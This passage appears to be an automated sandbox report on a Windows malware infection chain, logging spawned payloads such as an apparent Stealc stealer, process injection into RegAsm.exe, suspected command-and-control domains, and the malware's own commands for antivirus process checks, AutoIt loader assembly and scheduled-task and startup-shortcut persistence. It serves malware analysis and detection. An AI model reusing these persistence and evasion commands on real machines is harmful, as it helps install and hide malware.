Source: RDX123456.exe, 00000024.00000002.3148059827.0000000000986000.00000002.00000001.01000000.00000019.sdmp	String found in binary or memory: computeryrati.site
Source: shop.exe, 0000002C.00000002.3230063451.00000000013E5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: thighpecr.cyou

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F29600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

6_2_00F29600

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 451000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 466000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46D000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 46E000
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 710008

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe "C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe "C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe "C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe "C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe "C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe "C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe "C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe "C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe "C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Beijing Beijing.bat & Beijing.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 197036
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "CRAWFORDFILLEDVERIFYSCALE" Mtv
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Twisted + ..\Molecular + ..\Sponsorship + ..\Various + ..\Witch + ..\Spirit + ..\See + ..\Fitting T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif Jurisdiction.pif T
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Wall" /tr "wscript //B 'C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js'" /sc minute /mo 5 /F
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.scr" "C:\Users\user\AppData\Local\GreenTech Dynamics\O"
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process created: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe "C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe"
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process created: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe "C:\Users\user\AppData\Local\Temp\1001425001\shop.exe"
Source: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & echo url="c:\users\user\appdata\local\greentech dynamics\ecocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & exit
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & echo url="c:\users\user\appdata\local\greentech dynamics\ecocraft.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecocraft.url" & exit

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_6C184760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

6_2_6C184760

Source: splwow64.exe, 00000009.00000003.2554001535.00000000028F7000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 00000013.00000000.2596619246.0000000000E66000.00000002.00000001.01000000.0000000E.sdmp, Jurisdiction.pif, 00000013.00000003.2606591118.00000000040C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, axplong.exe	Binary or memory string: n[=Program Manager
Source: file.exe, 00000000.00000002.1730081745.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1758480704.0000000000A32000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: [=Program Manager

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_6BF8B341 cpuid

6_2_6BF8B341

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

6_2_00F27B90

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001096001\RDX123456.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001172001\Set-up.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001172001\Set-up.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001475001\0b44ippu.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001507001\1bd0484d71.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1001507001\1bd0484d71.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
